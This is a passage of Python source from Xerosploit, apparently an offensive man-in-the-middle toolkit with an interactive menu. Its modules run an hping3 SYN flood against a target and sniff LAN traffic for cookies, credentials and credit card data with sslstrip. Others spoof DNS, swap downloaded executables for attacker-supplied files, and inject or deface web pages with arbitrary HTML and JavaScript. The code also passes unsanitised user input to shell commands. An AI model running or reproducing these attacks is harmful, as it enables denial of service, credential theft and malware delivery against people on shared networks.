									]
									table = DoubleTable(table_data)
									print("\033[1;36m\n[+]═════════[ Port scan result for " + target_ips +" ]═════════[+]\n\033[1;m")
									print(table.table)
									pscan()

								else:
									# if all ports are closed, show an error message.
									print (check_open_port)
									print ("\033[1;91m[!] All 1000 scanned ports on " + target_name + " are closed\033[1;m")
									pscan()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								pscan()


						pscan()

			#DoS attack
					elif options == "dos":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          DoS Attack                          █
█                                                              █
█    Send a succession of SYN requests to a target's system    █
█    to make the system unresponsive to legitimate traffic     █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def dos():
							 
							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Dos : You must specify only one target host at a time .\033[1;m")
								option()

							print("\033[1;32m\n[+] Enter 'run' to execute the 'dos' command.\n\033[1;m")
							

							action_dos = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdos\033[0m\033[1;36m ➮ \033[1;m").strip() 

							if action_dos == "back":
								option()
							elif action_dos == "exit":
								sys.exit(exit_msg)	
							elif action_dos == "home":
								home()
							elif action_dos == "run":
								
								print("\033[1;34m\n[++] Performing a DoS attack to " + target_ips + " ... \n\n[++] Press 'Ctrl + C' to stop.\n\033[1;m")

								dos_cmd = os.system("hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source " + target_ips) # DoS command, using hping3
								dos()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								dos()
						dos()

			# Ping
					elif options == "ping":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                             Ping                             █
█                                                              █
█               Check the accessibility of devices             █
█     and show how long it takes for packets to reach host     █
└══════════════════════════════════════════════════════════════┘     \033[1;m""") 
						def ping():

							if target_ips == "" or "," in target_ips:
								print("\033[1;91m\n[!] Ping : You must specify only one target host at a time .\033[1;m")
								option()
							
							
							print("\033[1;32m\n[+] Enter 'run' to execute the 'ping' command.\n\033[1;m")

							action_ping = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mping\033[0m\033[1;36m ➮ \033[1;m").strip() 

							if action_ping == "back":
								option()
							elif action_ping == "exit":
								sys.exit(exit_msg)	
							elif action_ping == "home":
								home()
							elif action_ping == "run":
								print("\033[1;34m\n[++] PING " + target_ips + " (" + target_ips + ") 56(84) bytes of data ... \n\033[1;m")
								ping_cmd = os.popen("ping -c 5 " + target_ips).read()
								fping = open('/opt/xerosploit/tools/log/ping.txt','w') # Save the ping result, then grep some information.
								fping.write(ping_cmd)
								fping.close()

								ping_transmited = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $1}'").read()
								ping_receive = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $4}'").read()
								ping_lost = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $6}'").read()
								ping_time = os.popen("grep packets /opt/xerosploit/tools/log/ping.txt | awk '{print $10}'").read()

								table_data = [
				    				['Transmitted', 'Received', 'Loss','Time'],
				    				[ping_transmited, ping_receive, ping_lost, ping_time]
								]
								table = DoubleTable(table_data)
								print("\033[1;36m\n[+]═════════[ " + target_ips +" ping statistics  ]═════════[+]\n\033[1;m")
								print(table.table)
								ping()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								ping()

						ping()

					elif options == "injecthtml":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         Inject Html                          █
█                                                              █
█           Inject Html code in all visited webpages           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def inject_html():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'injecthtml' command.\n\033[1;m")
							action_inject = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjecthtml\033[0m\033[1;36m ➮ \033[1;m").strip() 
							if action_inject == "back":
								option()
							elif action_inject == "exit":
								sys.exit(exit_msg)	
							elif action_inject == "home":
								home()
							elif action_inject == "run":
								print("\033[1;32m\n[+] Specify the file containing html code you would like to inject.\n\033[1;m")
								html_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mInjecthtml\033[0m\033[1;36m ➮ \033[1;m")
								
								if html_file == "back":
									inject_html()
								elif html_file == "home":
									home()
								else:

									html_file = html_file.replace("'","")
									print("\033[1;34m\n[++] Injecting Html code ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_code = os.system("cp " + html_file + " /opt/xerosploit/tools/bettercap/modules/tmp/file.html")
									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file " + html_file + " -I " + up_interface + " --gateway " + gateway )

									inject_html()

							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								inject_html()
						inject_html()


					elif options == "rdownload":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                       Replace Download                       █
█                                                              █
█            Replace files being downloaded via HTTP           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def rdownload():
							print("\033[1;32m\n[+] Please type 'run' to execute the 'rdownload' command.\n\033[1;m")
							action_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip() 
							if action_rdownload == "back":
								option()
							elif action_rdownload == "exit":
								sys.exit(exit_msg)	
							elif action_rdownload == "home":
								home()
							elif action_rdownload == "run":
								module = "/opt/xerosploit/tools/bettercap/modules/http/replace_file.rb"
								print("\033[1;32m\n[+] Specify the extension of the files to replace. (e.g. exe)\n\033[1;m")
								ext_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m").strip()
								print("\033[1;32m\n[+] Set the file to use in order to replace the ones matching the extension.\n\033[1;m")
								file_rdownload = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mrdownload\033[0m\033[1;36m ➮ \033[1;m")
								file_rdownload = file_rdownload.replace("'","")
								if file_rdownload == "back":
									rdownload()
								elif file_rdownload == "home":
									home()
								elif file_rdownload == "exit":
									sys.exit(exit_msg)
								else:
								
									print("\033[1;34m\n[++] All ." + ext_rdownload + " files will be replaced by " + file_rdownload + "  \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_rdownload = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/replace_file.rb' --file-extension " + ext_rdownload + " --file-replace " + file_rdownload + " -I " + up_interface + " --gateway " + gateway )
									rdownload()						
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								rdownload()
						rdownload()
					elif options == "sniff":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Sniffing                           █
█                                                              █
█      Capturing any data passed over your local network       █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")

						def snif():
							print("\033[1;32m\n[+] Please type 'run' to execute the 'sniff' command.\n\033[1;m")
							action_snif = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_snif == "back":
								option()
							elif action_snif == "exit":
								sys.exit(exit_msg)	
							elif action_snif == "home":
								home()
							elif action_snif == "run":
								def snif_sslstrip():

									print("\033[1;32m\n[+] Do you want to load sslstrip ? (y/n).\n\033[1;m")
									action_snif_sslstrip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
									if action_snif_sslstrip == "y":
										print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m")
										print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m")
										print("\033[1;34m\n[++] sslstrip : \033[1;32mON\033[0m \033[1;m")
										print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")

										date = os.popen("""date | awk '{print $2"-"$3"-"$4}'""").read()
										filename = target_ips + date
										filename = filename.replace("\n","")
										make_file = os.system("mkdir -p /opt/xerosploit/xerosniff && cd /opt/xerosploit/xerosniff && touch " + filename + ".log")
										cmd_show_log = os.system("""xterm -geometry 100x24 -T 'Xerosploit' -hold -e "tail -f /opt/xerosploit/xerosniff/""" + filename + """.log  | GREP_COLOR='01;36' grep --color=always -E '""" + target_ips +  """|DNS|COOKIE|POST|HEADERS|BODY|HTTPS|HTTP|MQL|SNPP|DHCP|WHATSAPP|RLOGIN|IRC|SNIFFER|PGSQL|NNTP|DICT|CREDITCARD|HTTPAUTH|TEAMVIEWER|MAIL|SNMP|MPD|NTLMSS|FTP|REDIS|GET|$'" > /dev/null 2>&1 &""")
										cmd_snif = os.system("xettercap --proxy " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,CREDITCARD,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap")
										def snifflog():
											print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
											action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
											if action_log == "n":
												cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
												print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "y":
												print("\033[1;32m\n[++] Logs have been saved. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "exit":
												sys.exit(exit_msg)


											else:
												print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
												snifflog()
										snifflog()

									elif action_snif_sslstrip == "n":
										print("\033[1;34m\n[++] All logs are saved on : /opt/xerosploit/xerosniff \033[1;m")
										print("\033[1;34m\n[++] Sniffing on " + target_name + "\033[1;m")
										print("\033[1;34m\n[++] sslstrip : \033[1;91mOFF\033[0m \033[1;m")
										print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
										
										date = os.popen("""date | awk '{print $2"-"$3"-"$4}'""").read()
										filename = target_ips + date
										filename = filename.replace("\n","")
										make_file = os.system("mkdir -p /opt/xerosploit/xerosniff && cd /opt/xerosploit/xerosniff && touch " + filename + ".log")
										cmd_show_log = os.system("""xterm -geometry 100x24 -T 'Xerosploit' -hold -e "tail -f /opt/xerosploit/xerosniff/""" + filename + """.log  | GREP_COLOR='01;36' grep --color=always -E '""" + target_ips +  """|DNS|COOKIE|POST|HEADERS|BODY|HTTPS|HTTP|MQL|SNPP|DHCP|WHATSAPP|RLOGIN|IRC|SNIFFER|PGSQL|NNTP|DICT|CREDITCARD|HTTPAUTH|TEAMVIEWER|MAIL|SNMP|MPD|NTLMSS|FTP|REDIS|GET|$'" > /dev/null 2>&1 &""")
										cmd_snif = os.system("xettercap " + target_parse + target_ips + " -P MYSQL,SNPP,DHCP,WHATSAPP,RLOGIN,IRC,HTTPS,POST,PGSQL,NNTP,DICT,CREDITCARD,HTTPAUTH,TEAMVIEWER,MAIL,SNMP,MPD,COOKIE,NTLMSS,FTP,REDIS -I " + up_interface + " --gateway " + gateway + " -O, --log /opt/xerosploit/xerosniff/" + filename + ".log --sniffer-output /opt/xerosploit/xerosniff/" + filename + ".pcap")

										
										def snifflog():
											print("\033[1;32m\n[+] Do you want to save logs ? (y/n).\n\033[1;m")
											action_log = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4msniff\033[0m\033[1;36m ➮ \033[1;m").strip()
											if action_log == "n":
												cmd_log = os.system("rm /opt/xerosploit/xerosniff/" + filename + ".*")
												print("\033[1;31m\n[++] Logs have been removed. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "y":
												print("\033[1;32m\n[++] Logs have been saved. \n\033[1;m")
												sleep(1)
												snif()

											elif action_log == "exit":
												sys.exit(exit_msg)


											else:
												print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
												snifflog()
										snifflog()

									elif action_snif == "back":
										snif()
									elif action_snif == "exit":
										sys.exit(exit_msg)	
									elif action_snif == "home":
										home()
									else:
										print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
										snif_sslstrip()
								snif_sslstrip()
							
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								snif()

						snif()

					elif options == "dspoof":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                         DNS spoofing                         █
█                                                              █
█   Supply false DNS information to all target browsed hosts   █
█     Redirect all the http traffic to the specified one IP    █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def dspoof():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'dspoof' command.\n\033[1;m")
							action_dspoof = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_dspoof == "back":
								option()
							elif action_dspoof == "exit":
								sys.exit(exit_msg)	
							elif action_dspoof == "home":
								home()
							elif action_dspoof == "run":
								print("\033[1;32m\n[+] Enter the IP address where you want to redirect the traffic.\n\033[1;m")
								action_dspoof_ip = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdspoof\033[0m\033[1;36m ➮ \033[1;m").strip()
								dns_conf = action_dspoof_ip + " .*\.*"
								outdns = open('/opt/xerosploit/tools/files/dns.conf','w')
								outdns.write(dns_conf)
								outdns.close()

								print("\033[1;34m\n[++] Redirecting all the traffic to " + action_dspoof_ip + " ... \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")

								cmd_dspoof = os.system("xettercap " + target_parse + target_ips + " --dns /opt/xerosploit/tools/files/dns.conf --custom-parser DNS -I " + up_interface + " --gateway " + gateway)
								dspoof()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								dspoof()
						dspoof()
					elif options == "yplay":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Yplay                             █
█                                                              █
█    Play youtube videos as background sound in all webpages   █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def yplay():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'yplay' command.\n\033[1;m")
							action_yplay = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_yplay == "back":
								option()
							elif action_yplay == "exit":
								sys.exit(exit_msg)	
							elif action_yplay == "home":
								home()
							elif action_yplay == "run":
								print("\033[1;32m\n[+] Insert a youtube video ID. (e.g. NvhZu5M41Z8)\n\033[1;m")
								video_id = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4myplay\033[0m\033[1;36m ➮ \033[1;m").strip()
								if video_id == "back":
									option()
								elif video_id == "": # if raw = null
									print("\033[1;91m\n[!] Error : Please specify your video ID.\033[1;m")
									yplay()
								elif video_id == "exit":
									sys.exit(exit_msg)	
								elif video_id == "home":
									home()
								else:
									code = "<head> <iframe width='0' height='0' src='http://www.youtube.com/embed/" + video_id + "?autoplay=1' frameborder='0' allowfullscreen></iframe>"
									code_yplay = open('/opt/xerosploit/tools/bettercap/modules/tmp/yplay.txt','w')
									code_yplay.write(code)
									code_yplay.close()
									print("\033[1;34m\n[++] PLaying : https://www.youtube.com/watch?v=" + video_id + " \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_yplay = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/rickroll.rb' -I " + up_interface + " --gateway " + gateway)
									yplay()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								yplay()
						yplay()


					elif options == "replace":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█          Replace all web page images with your own           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def replace():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'replace' command.\n\033[1;m")
							action_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_replace == "back":
								option()
							elif action_replace == "exit":
								sys.exit(exit_msg)	
							elif action_replace == "home":
								home()
							elif action_replace == "run":
								print("\033[1;32m\n[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)\n\033[1;m")
								img_replace = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mreplace\033[0m\033[1;36m ➮ \033[1;m")
								img_replace = img_replace.replace("'","")
								if img_replace == "back":
									replace()
								elif img_replace == "exit":
									sys.exit(exit_msg)	
								elif img_replace == "home":
									home()
								else:
									from PIL import Image
									img = Image.open(img_replace)
									img.save('/opt/xerosploit/tools/bettercap/modules/tmp/ximage.png')
									print("\033[1;34m\n[++] All images will be replaced by " + img_replace + "\033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									

									cmd_replace = os.system("xettercap " + target_parse + target_ips + " --proxy-module='/opt/xerosploit/tools/bettercap/modules/replace_images.rb' --httpd --httpd-path /opt/xerosploit/tools/bettercap/modules/tmp/ -I " + up_interface + " --gateway " + gateway)

									replace()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								replace()

						replace()


					elif options == "driftnet":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                            Driftnet                          █
█                                                              █
█          View all images requested by your target            █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def driftnet():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'driftnet' command.\n\033[1;m")
							action_driftnet = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdriftnet\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_driftnet == "back":
								option()
							elif action_driftnet == "exit":
								sys.exit(exit_msg)	
							elif action_driftnet == "home":
								home()
							elif action_driftnet == "run":
								print("\033[1;34m\n[++] Capturing requested images on " + target_name + " ... \033[1;m")
								print("\033[1;34m\n[++] All captured images will be temporarily saved in /opt/xerosploit/xedriftnet \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
								cmd_driftnet = os.system("mkdir -p /opt/xerosploit/xedriftnet && driftnet -d /opt/xerosploit/xedriftnet > /dev/null 2>&1 &")
								cmd_driftnet_sniff = os.system("xettercap  -X")
								cmd_driftnet_2 = os.system("rm -R /opt/xerosploit/xedriftnet")
								driftnet()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								driftnet()
						driftnet()

					elif options == "move":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                           Shakescreen                        █
█                                                              █
█                   Shaking Web Browser content                █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def shakescreen():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'move' command.\n\033[1;m")
							action_shakescreen = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mshakescreen\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_shakescreen == "back":
								option()
							elif action_shakescreen == "exit":
								sys.exit(exit_msg)	
							elif action_shakescreen == "home":
								home()
							elif action_shakescreen == "run":
								print("\033[1;34m\n[++] Injecting shakescreen.js  ... \033[1;m")
								print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
								cmd_shakescreen = os.system("xettercap " + target_parse + target_ips + " --proxy-module=injectjs --js-file '/opt/xerosploit/tools/bettercap/modules/js/shakescreen.js' -I " + up_interface + " --gateway " + gateway)
								shakescreen()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								shakescreen()

						shakescreen()

					elif options == "injectjs":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                       Inject Javascript                      █
█                                                              █
█       Inject JavaScript code in all visited web pages.       █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def inject_j():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'injectjs' command.\n\033[1;m")
							action_inject_j = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_inject_j == "back":
								option()
							elif action_inject_j == "exit":
								sys.exit(exit_msg)	
							elif action_inject_j == "home":
								home()
							elif action_inject_j == "run":
								print("\033[1;32m\n[+] Specify the file containing js code you would like to inject.\n\033[1;m")
								js_file = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4minjectjs\033[0m\033[1;36m ➮ \033[1;m")
								js_file = js_file.replace("'","")
								if js_file == "back":
									inject_j()
								elif js_file == "exit":
									sys.exit(exit_msg)	
								elif js_file == "home":
									home()
								else:

									print("\033[1;34m\n[++] Injecting Javascript code ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop . \n\033[1;m")
									cmd_inject_j = os.system("xettercap " + target_parse + target_ips + " --proxy-module=injectjs --js-file " + js_file + " -I " + up_interface + " --gateway " + gateway)
									inject_j()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								inject_j()

						inject_j()

					elif options == "deface":
						print(""" \033[1;36m
┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                        Deface Web Page                       █
█                                                              █
█        Overwrite all web pages with your HTML code           █
└══════════════════════════════════════════════════════════════┘     \033[1;m""")
						def deface():
							print("\033[1;32m\n[+] Enter 'run' to execute the 'deface' command.\n\033[1;m")
							action_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m").strip()
							if action_deface == "back":
								option()
							elif action_deface == "exit":
								sys.exit(exit_msg)	
							elif action_deface == "home":
								home()
							elif action_deface == "run":
								print("\033[1;32m\n[+] Specify the file containing your defacement code .\033[1;m")
								print("\033[1;33m\n[!] Your file should not contain Javascript code .\n\033[1;m")
								
								file_deface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mmodules\033[0m»\033[1;36m\033[4mdeface\033[0m\033[1;36m ➮ \033[1;m")
								
								if file_deface == "back":
									option()
								elif file_deface == "exit":
									sys.exit(exit_msg)	
								elif file_deface == "home":
									home()
								else:
									file_deface = file_deface.replace("'","")
									file_deface = open(file_deface, 'r').read()
									file_deface = file_deface.replace("\n","")

									print("\033[1;34m\n[++] Overwriting all web pages ... \033[1;m")
									print("\033[1;34m\n[++] Press 'Ctrl + C' to stop.\n\033[1;m")

									content = """<script type='text/javascript'> window.onload=function(){document.body.innerHTML = " """ + file_deface + """ ";}</script>"""
									f1 = open('/home/home/xero-html.html','w')
									f1.write(content)
									f1.close()

									cmd_inject = os.system("xettercap " + target_parse + target_ips + " --proxy-module=/opt/xerosploit/tools/bettercap/lib/bettercap/proxy/http/modules/injecthtml.rb --js-file /home/home/xero-html.html -I " + up_interface + " --gateway " + gateway )
									deface()
							else:
								print("\033[1;91m\n[!] Error : Command not found.\033[1;m")
								deface()

						deface()

					elif options == "back":
						target_ip()	
					elif options == "exit":
						sys.exit(exit_msg)
					elif options == "home":
						home()
					# Show available modules.
					elif options == "help":
						print ("")
						table_datas = [
		    				["\033[1;36m\n\n\n\n\n\n\n\n\n\n\n\n\n\nMODULES\n", """
pscan       :  Port Scanner

dos         :  DoS Attack

ping        :  Ping Request

injecthtml  :  Inject HTML code

injectjs    :  Inject JavaScript code

rdownload   :  Replace files being downloaded

sniff       :  Capture information inside network packets

dspoof      :  Redirect all HTTP traffic to a specified IP

yplay       :  Play background sound in target browser

replace     :  Replace all web page images with your own

driftnet    :  View all images requested by your targets

move        :  Shaking Web Browser content

deface      :  Overwrite all web pages with your HTML code\n\033[1;m"""]
						]
						table = DoubleTable(table_datas)
						print(table.table)
						option()
					else:
						print("\033[1;91m\n[!] Error : Module not found . Type 'help' to view the modules list. \033[1;m")
						option()
				option()



			if target_ips == "back":
				home()
			elif target_ips == "exit":
				sys.exit(exit_msg)
			elif target_ips == "home":
				home()
			elif target_ips == "help":
				table_datas = [
		    		["\033[1;36m\nInformation\n", "\nInsert your target IP address.\nMultiple targets : ip1,ip2,ip3,... \nThe 'all' command will target all your network.\n\n\033[1;m"]
				]
				table = DoubleTable(table_datas)
				print(table.table)
				target_ip()
			# if the target is the entire network
			elif target_ips == "all": 

				target_ips = ""
				target_parse = ""
				target_name = "All your network"
				program0()

			else:
				program0()







		def cmd0():
			while True:
				print("\033[1;32m\n[+] Please type 'help' to view commands.\n\033[1;m")
				cmd_0 = raw_input("\033[1;36m\033[4mXero\033[0m\033[1;36m ➮ \033[1;m").strip()
				if cmd_0 == "scan": # Map the network
					print("\033[1;34m\n[++] Mapping your network ... \n\033[1;m")
					scan()
				elif cmd_0 == "start": # Skip network mapping and directly choose a target.
					target_ip()
				elif cmd_0 == "gateway": # Change gateway
					def gateway():
						print("")
						table_datas = [
			    			["\033[1;36m\nInformation\n", "\nManually set  your gateway.\nInsert '0' if you want to choose your default network gateway.\n\033[1;m"]
						]
						table = DoubleTable(table_datas)
						print(table.table)

						print("\033[1;32m\n[+] Enter your network gateway.\n\033[1;m")
						n_gateway = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mgateway\033[0m\033[1;36m ➮ \033[1;m").strip()
			
						if n_gateway == "back":
							home()
						elif n_gateway == "exit":
							sys.exit(exit_msg)
						elif n_gateway == "home":
							home()
						else:

							s_gateway = open('/opt/xerosploit/tools/files/gateway.txt','w')
							s_gateway.write(n_gateway)
							s_gateway.close()

							home()
					gateway()

				elif cmd_0 == "iface": # Change network interface.
					def iface():
						print ("")
						table_datas = [
			    			["\033[1;36m\nInformation\n", "\nManually set your network interface.\nInsert '0' if you want to choose your default network interface.\n\033[1;m"]
						]
						table = DoubleTable(table_datas)
						print(table.table)

						print("\033[1;32m\n[+] Enter your network interface.\n\033[1;m")
						n_up_interface = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4miface\033[0m\033[1;36m ➮ \033[1;m").strip()

						if n_up_interface == "back":
							home()
						elif n_up_interface == "exit":
							sys.exit(exit_msg)
						elif n_up_interface == "home":
							home()
						else:
							s_up_interface = open('/opt/xerosploit/tools/files/iface.txt','w')
							s_up_interface.write(n_up_interface)
							s_up_interface.close()

							home()
					iface()		
				elif cmd_0 == "exit":
					sys.exit(exit_msg)

				elif cmd_0 == "home":
					home()

				elif cmd_0 == "rmlog": # Remove all logs
					def rm_log():
						print("\033[1;32m\n[+] Do want to remove all xerosploit logs ? (y/n)\n\033[1;m")
						cmd_rmlog = raw_input("\033[1;36m\033[4mXero\033[0m»\033[1;36m\033[4mrmlog\033[0m\033[1;36m ➮ \033[1;m").strip()
						if cmd_rmlog == "y":
							rmlog = os.system("rm -f -R /opt/xerosploit/xerosniff/ /opt/xerosploit/tools/log/* /opt/xerosploit/tools/bettercap/modules/tmp/* /opt/xerosploit/tools/files/dns.conf")
							print("\033[1;31m\n[++] All logs have been removed. \n\033[1;m")
							sleep(1)
							home()
						elif cmd_rmlog == "n":
							home()
						
						elif cmd_rmlog == "exit":
							sys.exit(exit_msg)

						elif cmd_rmlog == "home":
							home()
						elif cmd_rmlog == "back":
							home()
						else:
							print("\033[1;91m\n[!] Error : Command not found. type 'y' or 'n'\033[1;m")
							rm_log()
					rm_log()	
# Principal commands
				elif cmd_0 == "help":
					print ("")
					table_datas = [
			    		["\033[1;36m\n\n\n\nCOMMANDS\n", """
scan     :  Map your network.

iface    :  Manually set your network interface.

gateway  :  Manually set your gateway.

start    :  Skip scan and directly set your target IP address.

rmlog    :  Delete all xerosploit logs.

help     :  Display this help message.

exit     :  Close Xerosploit.\n\033[1;m"""]
					]
					table = DoubleTable(table_datas)
					print(table.table)


				else:
					print("\033[1;91m\n[!] Error : Command not found.\033[1;m")


		home()			
		cmd0()


	except KeyboardInterrupt:
		print ("\n" + exit_msg)
		sleep(1)
	except Exception:
		traceback.print_exc(file=sys.stdout)
	sys.exit(0)
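
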